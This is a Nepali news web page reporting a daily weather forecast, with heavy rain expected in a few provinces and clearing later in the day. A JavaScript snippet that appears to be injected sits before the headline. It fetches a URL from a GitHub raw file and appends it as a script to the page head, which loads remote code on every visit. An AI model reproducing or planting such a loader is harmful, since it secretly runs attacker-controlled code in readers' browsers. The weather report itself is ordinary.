;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); यस्तो छ आजको मौसम – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
समाचार

यस्तो छ आजको मौसम

मौसम

भदौ ९,
काठमाण्डौ । आज देशका एक/दुई ठाउँमा ठूलो पानी पर्ने मौसमविद्ले बताएका छन् । अहिले देशका धेरै ठाउँको मौसम आंशिकदेखि सामान्य बदली भएको छ । केही ठाउँमा हल्का पानी पनि परिरहेको मौसम पूर्वानुमान महाशाखाले जनाएको छ ।

बिस्तारै पानी पर्न रोकिएर मौसम खुल्दै जाने मौसमविद् गंगा नगरकोटीले जानकारी दिए । उनका अनुसार दिउँसोपछि भने फेरि बादल लागेर कतै-कतै मेघगर्जनसहित पानी पर्न सक्नेछ । प्रदेश १, प्रदेश २ र वाग्मती प्रदेशका एक/दुई ठाउँमा ठूलो पानी पनि पर्ने संभावना रहेको उहाँले बताउनुभयो । तर नजिकै पानी परे पनि नजिकै अर्को ठाउँमा नपर्न पनि सक्ने उनको भनाइ छ ।

यस्तै राति देशभरिकै मौसम सामान्यतया बदली भई प्रदेश १, प्रदेश २, वाग्मती प्रदेश, गण्डकी प्रदेश र कर्णाली प्रदेशका एक दुई ठाउँमा ठूलो पानी परे पनि अरु ठाउँमा हल्कादेखि मध्यम खालको पानी पर्ने सम्भावना रहेको मौसम पूर्वानुमान महाशाखाले जनाएको छ ।file Photo

फेसबुक प्रतिक्रियाहरु